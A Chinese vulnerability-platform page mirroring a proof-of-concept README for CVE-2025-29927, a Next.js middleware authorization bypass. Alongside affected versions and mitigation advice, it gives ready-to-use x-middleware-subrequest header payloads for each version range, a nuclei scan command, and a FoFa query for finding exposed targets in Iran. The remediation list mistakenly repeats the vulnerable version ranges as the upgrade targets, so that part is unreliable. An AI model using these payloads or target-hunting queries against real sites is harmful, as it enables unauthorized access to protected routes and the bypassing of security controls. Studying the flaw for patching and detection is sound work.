漏洞平台

POC详情： 22d34e0b1819934cd5ef7484aab6ced91111ba1d

来源

https://github.com/kh4sh3i/CVE-2025-29927

关联漏洞

标题： Next.js 安全漏洞 (CVE-2025-29927)
描述：Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞，该漏洞源于如果授权检查发生在中间件中，可能绕过授权检查。

描述

CVE-2025-29927: Next.js Middleware Bypass Vulnerability

介绍

<h1 align="center">
  <br>
  <img src="/img/logo.png" alt="" width="500px;">
  <br>
  <img src="https://img.shields.io/badge/PRs-welcome-blue">
  <img src="https://img.shields.io/github/last-commit/kh4sh3i/CVE-2025-29927">
  <img src="https://img.shields.io/github/commit-activity/m/kh4sh3i/CVE-2025-29927">
  <a href="https://twitter.com/intent/follow?screen_name=kh4sh3i_"><img src="https://img.shields.io/twitter/follow/kh4sh3i_?style=flat&logo=twitter"></a>
  <a href="https://github.com/kh4sh3i"><img src="https://img.shields.io/github/stars/kh4sh3i?style=flat&logo=github"></a>
</h1>

# CVE-2025-29927
CVE-2025-29927: Next.js Middleware Bypass Vulnerability
This repository demonstrates the CVE-2025-29927 vulnerability in Next.js where the internal header x-middleware-subrequest can be used to bypass middleware checks like authentication.

  <img src="/img/poc.jpg" alt="" width="100%;">


## Affected Versions
```
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
```

## Mitigation and Remediation
* Upgrade Next.js to patched versions:
```
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
```

* If upgrading is not immediately possible, block or strip the x-middleware-subrequest header at the web server or proxy level:



## Impact Scenarios
* Authorization Bypass: Attackers can access protected routes without proper authentication or authorization.
* Content Security Policy (CSP) Bypass: If CSP headers are added via middleware, attackers can bypass these security controls, potentially enabling cross-site scripting (XSS) attacks.
* Denial of Service via Cache-Poisoning: In certain configurations, attackers could poison caches with unauthorized content by bypassing middleware that sets cache control headers.


## Using the nextjs-CVE-2025-29927 Nuclei template
```
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr
```

## Exploitation Across Different Next.js Versions
* For versions prior to 12.2:
```
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
```

* For versions 12.2 and later:
```
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
```

*  For versions 13.2.0 and later:
```
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
```

## Hunting traget with FoFa
```
header="x-middleware-rewrite" && country="IR"
```


### free CTF for this
* [CTF](https://app.hackinghub.io/hubs/cve-2025-29927)

文件快照


 [4.0K]  /data/pocs/22d34e0b1819934cd5ef7484aab6ced91111ba1d
├── [3.4K]  CVE-2025-29927.yaml
├── [4.0K]  img
│   ├── [ 11K]  logo.png
│   └── [ 56K]  poc.jpg
├── [6.9K]  LICENSE
└── [2.6K]  README.md

1 directory, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。